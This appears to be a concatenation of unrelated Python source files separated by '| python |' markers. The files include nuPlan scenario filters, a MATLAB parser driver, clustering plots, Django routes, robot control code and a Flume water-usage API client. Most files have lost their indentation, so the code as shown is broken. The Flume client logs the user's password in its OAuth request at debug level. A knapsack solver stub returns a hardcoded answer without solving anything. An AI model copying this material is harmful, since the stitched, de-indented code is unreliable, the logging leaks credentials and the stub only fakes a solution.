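# LAST_VALID_SCENE_IDX=-2 keeps scene indices 2..7 (i.e. 2 <= scene_idx < 10 - 2).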
def extract_scenes_from_log_db(
db: NuPlanDB, first_valid_idx: int = FIRST_VALID_SCENE_IDX, last_valid_idx: int = LAST_VALID_SCENE_IDX
) -> List[Scene]:
"""
Retrieve all valid scenes from a log database.
:param db: Log database to retrieve scenes from.
:param first_valid_idx: Index of first valid scene.
:param last_valid_idx: Index of last valid scene.
:return: Retrieved scenes.
"""
return list(db.scene)[first_valid_idx:last_valid_idx]
def create_scenarios_by_tokens(
scenario_tokens: List[Tuple[str, str]],
db: NuPlanDBWrapper,
log_names: Optional[List[str]],
expand_scenarios: bool,
vehicle_parameters: VehicleParameters,
ground_truth_predictions: Optional[TrajectorySampling],
) -> ScenarioDict:
"""
Create initial scenario dictionary based on desired tokens.
:param scenario_tokens: List of (log_name, lidarpc_tokens) used to initialize the scenario dict.
:param db: Object for accessing the available databases.
:param log_names: List of log names to include in the scenario dictionary.
:param expand_scenarios: Whether to expand multi-sample scenarios to multiple single-sample scenarios.
:param vehicle_parameters: Vehicle parameters for this db.
:param ground_truth_predictions: If None, no GT predictions will be extracted based on its future setting.
:return: Dictionary that holds a list of scenarios for each scenario type.
"""
logger.debug("Creating scenarios by tokens...")
# Whether to expand scenarios from multi-sample to single-sample scenarios
extraction_info = None if expand_scenarios else ScenarioExtractionInfo()
# Find all tokens that match the desired log names
if log_names:
candidate_log_names = set(log_names)
scenario_tokens = [(log_name, token) for log_name, token in scenario_tokens if log_name in candidate_log_names]
# Construct nuplan scenario objects for each (log_name, lidarpc token) pair
args = [DEFAULT_SCENARIO_NAME, extraction_info, vehicle_parameters, ground_truth_predictions]
scenarios = [NuPlanScenario(db.get_log_db(log_name), log_name, token, *args) for log_name, token in scenario_tokens]
return {DEFAULT_SCENARIO_NAME: scenarios}
def create_scenarios_by_types(
scenario_types: List[str],
db: NuPlanDBWrapper,
log_names: Optional[List[str]],
expand_scenarios: bool,
scenario_mapping: ScenarioMapping,
vehicle_parameters: VehicleParameters,
ground_truth_predictions: Optional[TrajectorySampling],
) -> ScenarioDict:
"""
Create initial scenario dictionary based on desired scenario types.
:param scenario_types: List of scenario types used to filter the pool of scenarios.
:param db: Object for accessing the available databases.
:param log_names: List of log names to include in the scenario dictionary.
:param expand_scenarios: Whether to expand multi-sample scenarios to multiple single-sample scenarios.
:param vehicle_parameters: Vehicle parameters for this db.
:param ground_truth_predictions: If None, no GT predictions will be extracted based on its future setting.
:return: Dictionary that holds a list of scenarios for each scenario type.
"""
logger.debug(f"Creating scenarios by types {scenario_types}...")
# Dictionary that holds a list of scenarios for each scenario type
scenario_dict: ScenarioDict = dict()
# Find all candidate scenario types
available_types = db.get_all_scenario_types()
candidate_types = set(scenario_types).intersection(available_types)
# Find all log dbs that match the desired log names
log_dbs = db.log_dbs
if log_names:
candidate_log_names = set(log_names)
log_dbs = [log_db for log_db in log_dbs if log_db.name in candidate_log_names]
# Populate scenario dictionary with list of scenarios for each type
for scenario_type in candidate_types:
extraction_info = None if expand_scenarios else scenario_mapping.get_extraction_info(scenario_type)
# TODO: Make scenario_tag.select_many method in DB
args = [scenario_type, extraction_info, vehicle_parameters, ground_truth_predictions]
scenario_dict[scenario_type] = [
NuPlanScenario(log_db, log_db.log_name, tag.lidar_pc_token, *args)
for log_db in log_dbs
for tag in log_db.scenario_tag.select_many(type=scenario_type)
if is_scene_valid(tag.lidar_pc.scene)
]
return scenario_dict
def create_all_scenarios(
db: NuPlanDBWrapper,
log_names: Optional[List[str]],
expand_scenarios: bool,
vehicle_parameters: VehicleParameters,
worker: WorkerPool,
ground_truth_predictions: Optional[TrajectorySampling],
) -> ScenarioDict:
"""
Create initial scenario dictionary containing all available scenarios in the scenario pool.
:param db: Object for accessing the available databases.
:param log_names: List of log names to include in the scenario dictionary.
:param expand_scenarios: Whether to expand multi-sample scenarios to multiple single-sample scenarios.
:param vehicle_parameters: Vehicle parameters for this db.
:param worker: Worker pool for concurrent scenario processing.
:param ground_truth_predictions: If None, no GT predictions will be extracted based on its future setting
:return: Dictionary that holds a list of scenarios for each scenario type.
"""
logger.debug('Creating all scenarios...')
# Whether to expand scenarios from multi-sample to single-sample scenarios
extraction_info = None if expand_scenarios else ScenarioExtractionInfo()
def get_scenarios_from_log_dbs(log_dbs: List[NuPlanDB]) -> List[NuPlanScenario]:
"""
Retrieve a list of nuplan scenario objects from a list of nuplan log databases.
        :param log_dbs: List of nuplan log databases.
:return: List of nuplan scenarios.
"""
def get_scenarios_from_log_db(log_db: NuPlanDB) -> List[NuPlanScenario]:
"""
Retrieve a list of nuplan scenario objects from a single nuplan log database.
Note: This method uses variables from the outer scope to avoid transferring unnecessary load across workers.
:param log_db: Nuplan log database.
:return: List of nuplan scenarios.
"""
# Total list of scene tokens in the database
scene_tokens = [scene.token for scene in extract_scenes_from_log_db(log_db)]
query = (
log_db.session.query(LidarPc.token)
.filter(LidarPc.scene_token.in_(scene_tokens))
.order_by(LidarPc.timestamp.asc())
.all()
)
# Construct nuplan scenario objects for this log
args = [DEFAULT_SCENARIO_NAME, extraction_info, vehicle_parameters, ground_truth_predictions]
scenarios = [NuPlanScenario(log_db, log_db.log_name, token, *args) for token, in query]
return scenarios
return [scenario for log_db in log_dbs for scenario in get_scenarios_from_log_db(log_db)]
# Find all log dbs that match the desired log names
log_dbs = db.log_dbs
if log_names:
candidate_log_names = set(log_names)
log_dbs = [log_db for log_db in log_dbs if log_db.name in candidate_log_names]
# Retrieve all scenarios for the total list of scenes concurrently
scenarios = worker_map(worker, get_scenarios_from_log_dbs, log_dbs)
return {DEFAULT_SCENARIO_NAME: scenarios}
def filter_by_log_names(scenario_dict: ScenarioDict, log_names: List[str]) -> ScenarioDict:
"""
Filter a scenario dictionary by log names.
:param scenario_dict: Dictionary that holds a list of scenarios for each scenario type.
:param log_names: List of log names to include in the scenario dictionary.
:return: Filtered scenario dictionary.
"""
scenario_dict = {
scenario_type: [scenario for scenario in scenarios if scenario.log_name in log_names]
for scenario_type, scenarios in scenario_dict.items()
}
return scenario_dict
def filter_by_map_names(scenario_dict: ScenarioDict, map_names: List[str], db: NuPlanDBWrapper) -> ScenarioDict:
"""
Filter a scenario dictionary by map names.
:param scenario_dict: Dictionary that holds a list of scenarios for each scenario type.
:param map_names: List of map names to include in the scenario dictionary.
:param db: Object for accessing the available log databases.
:return: Filtered scenario dictionary.
"""
# Mapping from log name to map version
# TODO: Pass map name in scenario
log_maps = {log_db.log_name: log_db.map_name for log_db in db.log_dbs}
scenario_dict = {
scenario_type: [scenario for scenario in scenarios if log_maps[scenario.log_name] in map_names]
for scenario_type, scenarios in scenario_dict.items()
}
return scenario_dict
def filter_num_scenarios_per_type(
scenario_dict: ScenarioDict, num_scenarios_per_type: int, randomize: bool
) -> ScenarioDict:
"""
Filter the number of scenarios in a scenario dictionary per scenario type.
:param scenario_dict: Dictionary that holds a list of scenarios for each scenario type.
:param num_scenarios_per_type: Number of scenarios per type to keep.
:param randomize: Whether to randomly sample the scenarios.
:return: Filtered scenario dictionary.
"""
for scenario_type in scenario_dict:
if randomize and num_scenarios_per_type < len(scenario_dict[scenario_type]): # Sample scenarios randomly
scenario_dict[scenario_type] = random.sample(scenario_dict[scenario_type], num_scenarios_per_type)
else: # Sample the top k number of scenarios per type
scenario_dict[scenario_type] = scenario_dict[scenario_type][:num_scenarios_per_type]
return scenario_dict
def filter_total_num_scenarios(
scenario_dict: ScenarioDict, limit_total_scenarios: Union[int, float], randomize: bool
) -> ScenarioDict:
"""
Filter the total number of scenarios in a scenario dictionary.
:param scenario_dict: Dictionary that holds a list of scenarios for each scenario type.
:param limit_total_scenarios: Number of total scenarios to keep.
:param randomize: Whether to randomly sample the scenarios.
:return: Filtered scenario dictionary.
"""
scenario_list = scenario_dict_to_list(scenario_dict)
if isinstance(limit_total_scenarios, int): # Exact number of scenarios to keep
max_scenarios = limit_total_scenarios
scenario_list = (
random.sample(scenario_list, max_scenarios)
if randomize and max_scenarios < len(scenario_list)
else scenario_list[:max_scenarios]
)
elif isinstance(limit_total_scenarios, float): # Percentage of scenarios to keep
sample_ratio = limit_total_scenarios
assert 0.0 < sample_ratio < 1.0, f'Sample ratio has to be between 0 and 1, got {sample_ratio}'
step = int(1.0 / sample_ratio)
if step < len(scenario_list):
scenario_list = scenario_list[::step]
else:
raise TypeError('Scenario filter "limit_total_scenarios" must be of type int or float')
return scenario_list_to_dict(scenario_list)
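# For example, limit_total_scenarios=50 keeps at most 50 scenarios, while
# limit_total_scenarios=0.1 keeps every int(1.0 / 0.1) == 10th scenario of the sorted list.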
def filter_invalid_goals(scenario_dict: ScenarioDict, worker: WorkerPool) -> ScenarioDict:
"""
Filter the scenarios with invalid mission goals in a scenario dictionary.
:param scenario_dict: Dictionary that holds a list of scenarios for each scenario type.
:param worker: Worker pool for concurrent scenario processing.
:return: Filtered scenario dictionary.
"""
def _filter_goals(scenarios: List[NuPlanScenario]) -> List[NuPlanScenario]:
"""
Filter scenarios that contain invalid mission goals.
:param scenarios: List of scenarios to filter.
:return: List of filtered scenarios.
"""
return [scenario for scenario in scenarios if scenario.get_mission_goal()]
for scenario_type in scenario_dict:
scenario_dict[scenario_type] = worker_map(worker, _filter_goals, scenario_dict[scenario_type])
return scenario_dict
def scenario_dict_to_list(scenario_dict: ScenarioDict, shuffle: Optional[bool] = None) -> List[NuPlanScenario]:
"""
Unravel a scenario dictionary to a list of scenarios.
:param scenario_dict: Dictionary that holds a list of scenarios for each scenario type.
:param shuffle: Whether to shuffle the scenario list.
:return: List of scenarios.
"""
scenarios = [scenario for scenario_list in scenario_dict.values() for scenario in scenario_list]
scenarios = sorted(scenarios, key=lambda scenario: scenario.token) # type: ignore
if shuffle:
random.shuffle(scenarios)
return scenarios
def scenario_list_to_dict(scenario_list: List[NuPlanScenario]) -> ScenarioDict:
"""
Convert a list of scenarios to a dictionary.
:param scenario_list: List of input scenarios.
:return: Dictionary that holds a list of scenarios for each scenario type.
"""
scenario_dict: ScenarioDict = defaultdict(list)
for scenario in scenario_list:
scenario_dict[scenario.scenario_type].append(scenario)
return scenario_dict
| python |
from antlr4 import InputStream, CommonTokenStream, ParseTreeWalker
from parse.MATLABLexer import MATLABLexer
from parse.MATLABParser import MATLABParser
from TranslateListener import TranslateListener
from error.ErrorListener import ParseErrorExceptionListener
from error.Errors import ParseError
def parse(in_str):
if in_str is None:
in_str = "function y = foo(x)\n"
chars = InputStream.InputStream(in_str)
lexer = MATLABLexer(chars)
tokens = CommonTokenStream(lexer)
parser = MATLABParser(tokens)
try:
# Remove existing console error listener
# NB: as of 20150708 pip install of antlr4 needs Recognizer.py to be patched
# to add the removeErrorListener methods
parser.removeErrorListeners()
except:
pass
# Throw if parse fails
parser.addErrorListener(ParseErrorExceptionListener.INSTANCE)
errorDispatch = parser.getErrorListenerDispatch()
tree = parser.fileDecl()
return tree
def translate(tree=None, string=None):
if tree == None:
tree = parse(string)
# Actually do the walking
    evaluator = TranslateListener()
    walker = ParseTreeWalker()
    walker.walk(evaluator, tree)
if __name__ == '__main__':
import sys
if len(sys.argv) > 1:
with open(sys.argv[1], 'r') as f:
in_str = f.read()
else:
in_str = None
translate(string= in_str)
| python |
import cv2
import numpy as np
from matplotlib import cm
from matplotlib import pyplot as plt
from CS_data_generate import cs_data_generate
from deciVAT import deciVAT
from decVAT import decVAT
from dunns_index import dunns_index
from inciVat import inciVAT
from incVat import incVAT
def length(mat):
return np.max(mat.shape)
num_clusters = 3
num_points = 100
DI = 0
data_matrix_with_labels = 0
while DI < 1:
odds_matrix = np.ceil(
num_clusters * np.random.rand(1, num_clusters)).astype(int)
data_matrix_with_labels, dist_matrix = cs_data_generate(
number_of_clusters=num_clusters, odds_matrix=odds_matrix, total_no_of_points=num_points)
DI = dunns_index(num_clusters, dist_matrix, data_matrix_with_labels[:, 2])
colors_1 = np.array(cm.get_cmap().colors)
colors = np.zeros((num_clusters, 3))
for i in range(1, num_clusters+1):
colors[i-1, :] = colors_1[int(
np.ceil(max(colors_1.shape)*i/num_clusters)-1), :]
p1 = plt.figure(1)
for i in range(1, num_clusters+1):
cluster_index = np.array(np.where(data_matrix_with_labels[:, -1] == i))
plt.plot(data_matrix_with_labels[cluster_index, 0],
data_matrix_with_labels[cluster_index, 1], marker='o', color=colors[i-1, :], markersize=1)
# Add cv2 support
[N, M] = dist_matrix.shape
I = np.array([1, 2])
RV = dist_matrix[1:2, 1:2]
RiV = RV
d = dist_matrix[0, 1]
C = np.array([1, 1])
RI = np.array([1, 2])
RiV_index = [[0, 2], [2, 0]]
p2 = plt.figure(2)
for j in range(1, num_clusters+1):
    cluster_index = np.where(data_matrix_with_labels[np.sort(I), 2] == j)
    plt.plot(data_matrix_with_labels[cluster_index, 0],
             data_matrix_with_labels[cluster_index, 1], marker='o', color=colors[j-1, :], markersize=1)
p3 = plt.figure(3)
plt.rcParams["figure.autolayout"] = True
plt.imshow(RiV, cmap=cm.get_cmap('gray'), extent=[-1, 1, -1, 1])
for i in range(3, N):
distance_previous_points = dist_matrix[i, I]
[RV, C, I, RI, d, new_point_location] = incVAT(
RV, C, I, RI, d, distance_previous_points)
RiV = inciVAT(RV, RiV, new_point_location)
p4 = plt.figure(4)
for j in range(1, num_clusters+1):
    cluster_index = np.where(data_matrix_with_labels[np.sort(I), 2] == j)
    plt.plot(data_matrix_with_labels[cluster_index, 0],
             data_matrix_with_labels[cluster_index, 1], marker='o', color=colors[j-1, :], markersize=1)
p5 = plt.figure(5)
plt.rcParams["figure.autolayout"] = True
plt.imshow(RiV, cmap=cm.get_cmap('gray'), extent=[-1, 1, -1, 1])
while np.max(I.shape) > 3:
    point_to_remove = I[np.random.randint(length(I))]  # pick a random point to remove
    iVAT_point_to_remove_index = int(np.where(I == point_to_remove)[0][0])
    data_matrix_with_labels = np.delete(data_matrix_with_labels, iVAT_point_to_remove_index, axis=0)
RV, C, I, RI, d = decVAT(RV, C, I, RI, d, point_to_remove)
RiV = deciVAT(RV, RiV, iVAT_point_to_remove_index)
p6 = plt.figure(6)
for j in range(1, num_clusters+1):
    cluster_index = np.where(data_matrix_with_labels[np.sort(I), 2] == j)
    plt.plot(data_matrix_with_labels[cluster_index, 0],
             data_matrix_with_labels[cluster_index, 1], marker='o', color=colors[j-1, :], markersize=1)
p7 = plt.figure(7)
plt.rcParams["figure.autolayout"] = True
plt.imshow(RiV, cmap=cm.get_cmap('gray'), extent=[-1, 1, -1, 1])
| python |
from django.urls import path
from . import views
urlpatterns = [
path('iniciar-jogo/', views.JogoAPIView.as_view()),
path('finalizar-jogo/<int:id>', views.JogoAPIView.as_view()),
path('buscar-jogo/<int:id>', views.JogoAPIView.as_view()),
] | python |
import numpy
import os
import sys
def testing(l1, l2):
outputData = str(19) + ' ' + str(0) + '\n'
taken = [0, 0, 1, 1]
outputData += ' '.join(map(str, taken))
return outputData
def solveIt(inputData):
lines = inputData.split('\n')
l1, l2 = map(list, zip(*(s.split(" ") for s in lines)))
return testing(l1, l2)
if(len(sys.argv) == 2):
filename = sys.argv[1]
else:
sys.exit("Error: No input file provided. Please enter the path\\filename of the input file as an argument.")
f = open(filename, "r")
print(solveIt(f.read()))
f.close()
| python |
"""
CAR CONFIG
This file is read by your car application's manage.py script to change the car
performance.
EXAMPLE
-----------
import dk
cfg = dk.load_config(config_path='~/d2/config.py')
print(cfg.CAMERA_RESOLUTION)
"""
import os
#PATHS
CAR_PATH = PACKAGE_PATH = os.path.dirname(os.path.realpath(__file__))
DATA_PATH = os.path.join(CAR_PATH, 'data')
MODELS_PATH = os.path.join(CAR_PATH, 'models')
#VEHICLE
DRIVE_LOOP_HZ = 20
MAX_LOOPS = None
#CAMERA
CAMERA_RESOLUTION = (160, 120)
CAMERA_FRAMERATE = DRIVE_LOOP_HZ
#STEERING
STEERING_CHANNEL = 1
STEERING_LEFT_PWM = 460
STEERING_RIGHT_PWM = 290
#THROTTLE
THROTTLE_CHANNEL = 0
THROTTLE_FORWARD_PWM = 500
THROTTLE_STOPPED_PWM = 370
THROTTLE_REVERSE_PWM = 220
#TRAINING
BATCH_SIZE = 128
TRAIN_TEST_SPLIT = 0.8
#JOYSTICK
JOYSTICK_MAX_THROTTLE=1
JOYSTICK_STEERING_SCALE=1
USE_JOYSTICK_AS_DEFAULT = False
AUTO_RECORD_ON_THROTTLE = True
#ROTARY ENCODER
ROTARY_ENCODER_MM_PER_TICK=0.306096
ROTARY_ENCODER_PIN=27
MAX_VELOCITY=7.0
#THROTTLE PID
THROTTLE_PID_P=1.0
THROTTLE_PID_D=0.2
THROTTLE_PID_I=0.1
| python |
import wpilib.command
from wpilib import Timer
from data_logger import DataLogger
from profiler import TrapezoidalProfile
from pidcontroller import PIDController
from drivecontroller import DriveController
class ProfiledForward(wpilib.command.Command):
def __init__(self, distance_ft):
super().__init__("ProfiledForward")
self.drivetrain = self.getRobot().drivetrain
self.requires(self.drivetrain)
self.dist_ft = distance_ft
self.dist_enc = distance_ft * self.drivetrain.ratio
self.timer = Timer()
self.period = self.getRobot().getPeriod()
self.ctrl_heading = PIDController(
Kp=0, Ki=0, Kd=0, Kf=0,
source=self.drivetrain.getAngle,
output=self.correct_heading,
period=self.period,
)
self.ctrl_heading.setInputRange(-180, 180)
self.ctrl_heading.setOutputRange(-0.5, 0.5)
self.max_velocity_fps = 3 # ft/sec
self.max_v_encps = self.drivetrain.fps_to_encp100ms(self.max_velocity_fps)
self.max_acceleration = 3 # ft/sec^2
self.profiler_l = TrapezoidalProfile(
cruise_v=self.max_velocity_fps,
a=self.max_acceleration,
target_pos=self.dist_ft,
tolerance=(3/12.), # 3 inches
)
self.profiler_r = TrapezoidalProfile(
cruise_v=self.max_velocity_fps,
a=self.max_acceleration,
target_pos=-self.dist_ft,
tolerance=(3/12.), # 3 inches
)
self.ctrl_l = DriveController(
Kp=0, Kd=0,
Ks=1.293985, Kv=0.014172, Ka=0.005938,
get_voltage=self.drivetrain.getVoltage,
source=self.drivetrain.getLeftEncoderVelocity,
output=self.drivetrain.setLeftMotor,
period=self.period,
)
self.ctrl_l.setInputRange(-self.max_v_encps, self.max_v_encps)
self.ctrl_r = DriveController(
Kp=0, Kd=0,
Ks=1.320812, Kv=0.013736, Ka=0.005938,
get_voltage=self.drivetrain.getVoltage,
source=self.drivetrain.getRightEncoderVelocity,
output=self.drivetrain.setRightMotor,
period=self.period,
)
self.ctrl_r.setInputRange(-self.max_v_encps, self.max_v_encps)
self.target_v_l = 0
self.target_v_r = 0
self.target_a_l = 0
self.target_a_r = 0
self.pos_ft_l = 0
self.pos_ft_r = 0
def initialize(self):
self.drivetrain.zeroEncoders()
self.drivetrain.zeroNavx()
self.ctrl_l.enable()
self.ctrl_r.enable()
self.ctrl_heading.enable()
self.logger = DataLogger("profiled_forward.csv")
self.drivetrain.init_logger(self.logger)
self.logger.add("profile_vel_r", lambda: self.target_v_r)
self.logger.add("profile_vel_l", lambda: self.target_v_l)
self.logger.add("pos_ft_l", lambda: self.pos_ft_l)
self.logger.add("target_pos_l", lambda: self.profiler_l.target_pos)
self.logger.add("adist_l", lambda: self.profiler_l.adist)
self.logger.add("err_l", lambda: self.profiler_l.err)
self.logger.add("choice_l", lambda: self.profiler_l.choice)
self.logger.add("adist_r", lambda: self.profiler_l.adist)
self.logger.add("err_r", lambda: self.profiler_l.err)
self.logger.add("choice_r", lambda: self.profiler_l.choice)
self.timer.start()
#print ('pdf init')
def execute(self):
self.pos_ft_l = self.drivetrain.getLeftEncoder() / self.drivetrain.ratio
self.pos_ft_r = self.drivetrain.getRightEncoder() / self.drivetrain.ratio
#print ('pdf exec ', self.timer.get())
self.profiler_l.calculate_new_velocity(self.pos_ft_l, self.period )
self.profiler_r.calculate_new_velocity(self.pos_ft_r, self.period )
self.target_v_l = self.drivetrain.fps_to_encp100ms(self.profiler_l.current_target_v)
self.target_v_r = self.drivetrain.fps_to_encp100ms(self.profiler_r.current_target_v)
self.target_a_l = self.drivetrain.fps2_to_encpsp100ms(self.profiler_l.current_a)
self.target_a_r = self.drivetrain.fps2_to_encpsp100ms(self.profiler_r.current_a)
self.ctrl_l.setSetpoint(self.target_v_l)
self.ctrl_l.setAccelerationSetpoint(self.target_a_l)
self.ctrl_r.setSetpoint(self.target_v_r)
self.ctrl_r.setAccelerationSetpoint(self.target_a_r)
#self.drivetrain.setLeftMotor(self.ctrl_l.calculateFeedForward())
#self.drivetrain.setRightMotor(self.ctrl_r.calculateFeedForward())
self.logger.log()
self.drivetrain.feed()
def isFinished(self):
return (
            abs(self.pos_ft_l - self.dist_ft) < 1/3. and
self.profiler_l.current_target_v == 0 and
self.profiler_l.current_a == 0 and
self.profiler_r.current_target_v == 0 and
self.profiler_r.current_a == 0)
def end(self):
self.ctrl_l.disable()
self.ctrl_r.disable()
self.ctrl_heading.disable()
self.drivetrain.off()
self.logger.flush()
#print ('pdf end')
def correct_heading(self, correction):
self.profiler_l.setCruiseVelocityScale(1+correction)
self.profiler_r.setCruiseVelocityScale(1-correction)
| python |
from typing import Any, Dict
__all__ = (
"UserPublicMetrics",
"TweetPublicMetrics",
)
class UserPublicMetrics:
"""Represent a PublicMetrics for a User.
This PublicMetrics contain public info about the user.
.. versionadded:: 1.1.0
"""
def __init__(self, data: Dict[str, Any] = {}):
self.original_payload: Dict[str, Any] = data
self._public: Dict[Any, Any] = self.original_payload.get("public_metrics")
def __repr__(self) -> str:
return f"UserPublicMetrics(user={self.original_payload.get('username')} follower_count={self.follower_count} following_count={self.following_count} tweet_count={self.tweet_count})"
@property
def follower_count(self) -> int:
""":class:`int`: Returns total of followers that a user has.
.. versionadded:: 1.1.0
"""
return int(self._public.get("followers_count"))
@property
def following_count(self) -> int:
""":class:`int`: Returns total of following that a user has.
.. versionadded:: 1.1.0
"""
return int(self._public.get("following_count"))
@property
def tweet_count(self) -> int:
""":class:`int`: Returns total of tweet that a user has.
.. versionadded:: 1.1.0
"""
return int(self._public.get("tweet_count"))
@property
def listed_count(self) -> int:
""":class:`int`: Returns total of listed that a user has.
.. versionadded:: 1.1.0
"""
return int(self._public.get("listed_count"))
class TweetPublicMetrics:
"""Represent a PublicMetrics for a tweet.
This PublicMetrics contain public info about the tweet.
.. versionadded:: 1.1.0
"""
def __init__(self, data: Dict[str, Any] = {}) -> None:
self.original_payload = data
self._public = data.get("public_metrics")
def __repr__(self) -> str:
return f"TweetPublicMetrics(like_count={self.like_count} retweet_count={self.retweet_count} reply_count={self.reply_count}> quote_count={self.quote_count})"
@property
def like_count(self) -> int:
""":class:`int`: Return total of likes that the tweet has.
.. versionadded:: 1.1.0
"""
return int(self._public.get("like_count"))
@property
def retweet_count(self) -> int:
""":class:`int`: Return total of retweetes that the tweet has.
.. versionadded:: 1.1.0
"""
return int(self._public.get("retweet_count"))
@property
def reply_count(self) -> int:
""":class:`int`: Return total of replies that the tweet has.
.. versionadded:: 1.1.0
"""
return int(self._public.get("reply_count"))
@property
def quote_count(self) -> int:
""":class:`int`: Return total of quotes that the tweet has.
.. versionadded:: 1.1.0
"""
return int(self._public.get("quote_count"))
| python |
"""The Labeled Faces in the Wild (LFW) dataset.
from dltb.thirdparty.datasource.lfw import LabeledFacesInTheWild
lfw = LabeledFacesInTheWild()
lfw.prepare()
lfw.sklearn is None
"""
# standard imports
import logging
import importlib
# toolbox imports
from dltb.datasource import DataDirectory
# logging
LOG = logging.getLogger(__name__)
class EnvironmentalSoundClassification(DataDirectory):
"""A :py:class:`Datasource` for accessing the
    Dataset for Environmental Sound Classification [1], ESC-10 and ESC-50
[1] doi:10.7910/DVN/YDEPUT
"""
def __init__(self, key: str = None, esc_data: str = None,
**kwargs) -> None:
"""Initialize the Environmental Sound Classification (ESC) dataset.
Parameters
----------
esc_data: str
The path to the ESC root directory. This directory
should contain the (10 or 50) subdirectories holding
sound files for the respective classes.
"""
# directory = '/space/data/ESC/ESC-10' # FIXME[hack]
if esc_data is None:
esc_data = '/space/data/ESC/ESC-10'
description = "Environmental Sound Classification"
super().__init__(key=key or "esc",
directory=esc_data,
description=description,
label_from_directory='name',
**kwargs)
LOG.info("Initialized the Environmental Sound Classification "
"dataset (directory=%s)", self.directory)
def _prepare(self) -> None:
super()._prepare()
LOG.info("Prepared the Environmental Sound Classification "
"dataset (directory=%s)", self.directory)
| python |
import FWCore.ParameterSet.Config as cms
muonTrackProducer = cms.EDProducer("MuonTrackProducer",
muonsTag = cms.InputTag("muons"),
inputDTRecSegment4DCollection = cms.InputTag("dt4DSegments"),
inputCSCSegmentCollection = cms.InputTag("cscSegments"),
selectionTags = cms.vstring('TrackerMuonArbitrated'),
trackType = cms.string('innerTrackPlusSegments'),
ignoreMissingMuonCollection = cms.untracked.bool(False)
)
| python |
'''
This file provides a small client for the Flume water-monitoring API
(api.flumetech.com): it obtains OAuth credentials, lists bridge devices and
queries per-minute and current-month water usage.
'''
import logging
import urllib.parse
import requests
import datetime
import argparse
import json
import jwt
import pytz
import time
import math
class API(object):
def __init__(self, clientid=None, clientsecret=None,username=None, password=None,timezone=None):
assert clientid is not None
assert clientsecret is not None
self.clientid = clientid
self.clientsecret = clientsecret
self.username = username
self.password = password
self.timezone = timezone
self.session = requests.Session()
def unparse(self, obj):
return obj
def parse(self, string):
return string
def buildRequestHeader(self):
header = {"Authorization": "Bearer " + self.access_token}
return header
def device_list(self):
devices = []
headers = {"Authorization": "Bearer " + self.access_token}
resp = requests.request('GET', 'https://api.flumetech.com/users/' + str(self.user_id) + '/devices', headers=headers)
dataJSON = json.loads(resp.text)
logging.debug("Executed device search")
if dataJSON["http_code"] == 200:
for bridge in dataJSON["data"]:
logging.debug("JSON Data from device")
logging.debug(dataJSON["data"])
if bridge["type"] == 2:
devices.append(bridge["id"])
logging.debug("Executed device search")
return devices
def device_query(self, device_id, all=False, refresh=False):
result = []
        # use the configured timezone if given; make sure the timezone configured on FLUME is correct
if self.timezone :
now = datetime.datetime.now(pytz.timezone(self.timezone))
else :
now = datetime.datetime.now()
current_min= now.strftime('%Y-%m-%d %H:%M:00')
previous_min = (now - datetime.timedelta(minutes=1)).strftime('%Y-%m-%d %H:%M:00')
current_month = now.strftime('%Y-%m-01 00:00:00')
payload = '{"queries":[{"request_id":"perminute","bucket":"MIN","since_datetime":"' + previous_min + '","until_datetime":"' + current_min + '","group_multiplier":"1","operation":"SUM","sort_direction":"ASC","units":"GALLONS"}, {"request_id":"currentmonth","bucket":"MON","since_datetime":"' + current_month + '", "operation":"SUM"}]}'
logging.debug(payload)
headers = {"Authorization": "Bearer " + self.access_token}
headers["content-type"] = "application/json"
resp = requests.request("POST", "https://api.flumetech.com/users/" + str(self.user_id) + "/devices/" + str(device_id) + "/query", data=payload, headers=headers)
data = json.loads(resp.text)
logging.debug(data)
if data["http_code"]==200 :
result.append(data["data"][0]["perminute"][0]["value"])
result.append(data["data"][0]["currentmonth"][0]["value"])
return result
else:
return None
def credentials(self):
# get the credential
url = "https://api.flumetech.com/oauth/token"
payload = '{"grant_type":"password","client_id":"' + self.clientid + '","client_secret":"' + self.clientsecret + '","username":"' + self.username + '","password":"' + self.password + '"}'
headers = {'content-type': 'application/json'}
logging.debug("Post to server: " + payload)
resp = requests.request("POST", url, data=payload, headers=headers)
logging.debug("response from server: " + resp.text)
dataJSON = json.loads(resp.text)
if dataJSON["http_code"] == 200:
logging.debug("Got 200 response from auth token request")
self.access_token = dataJSON["data"][0]["access_token"]
self.refresh_token = dataJSON["data"][0]["refresh_token"]
else:
quit("Failed to get credential")
return
def userid(self):
decoded = jwt.decode(self.access_token, options={"verify_signature": False})
self.user_id = decoded["user_id"]
logging.debug(decoded)
return
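# Illustrative usage sketch (all credential values are placeholders):
#   api = API(clientid="...", clientsecret="...", username="...", password="...", timezone="US/Pacific")
#   api.credentials()              # obtain access/refresh tokens
#   api.userid()                   # decode user_id from the access token
#   for device_id in api.device_list():
#       usage = api.device_query(device_id)  # [gallons last minute, gallons this month] or None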
| python |
"""URLS for accounts"""
from django.urls import path
import django.contrib.auth.views
from . import views
# pylint: disable=invalid-name
app_name = 'accounts'
urlpatterns = [
path('login/', views.SocialLoginView.as_view(), name='login'),
path('login/native/', views.NativeLoginView.as_view(), name='login-native'),
path('logout/', django.contrib.auth.views.LogoutView.as_view(), name='logout')
]
| python |
# Copyright (c) Techland. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
"""Contains the Analyser class, used to run analysis on the dependency graph."""
import logging
import os
from collections import defaultdict
import networkx as nx
from cppbuildprofiler.dependency import DependencyGraph
def _pretty_filesize(size):
reduced_size = float(size)
prefixes = ['', 'K', 'M', 'G']
prefix_idx = 0
while reduced_size >= 1000.0:
reduced_size *= 0.001
prefix_idx += 1
assert(prefix_idx < len(prefixes)), 'Size is absurd: %s' % size
return '%0.2f%sB' % (reduced_size, prefixes[prefix_idx])
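# For example, _pretty_filesize(1536) returns '1.54KB' and _pretty_filesize(400) returns '400.00B'.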
class Analyser:
"""Performs an optimisation-related analysis on a dependency graph."""
class Attributes: # pylint: disable=too-few-public-methods
"""Contains names of depgraph attributes with analyser metrics"""
PROJECT = 'project'
ABSOLUTE_PATH = 'absolutepath'
COMPILATION_COMMAND = 'compilationcommand'
USED_PCH = 'usepch'
CREATED_PCH = 'createpch'
BUILD_TIME = 'buildtime'
FILE_SIZE = 'filesize'
TOTAL_SIZE = 'totalsize'
AGG_BUILD_TIME_DEV = 'avgbuildtimedev'
TRANSLATION_UNITS = 'translationunits'
def __init__(self):
pass
UNKNOWN_PROJECT_NAME = '__UNKNOWN__'
ROOT_COLUMNS = {
Attributes.BUILD_TIME: DependencyGraph.Column('total build time [s]', 0.0),
Attributes.TRANSLATION_UNITS: DependencyGraph.Column('total translation units', 0),
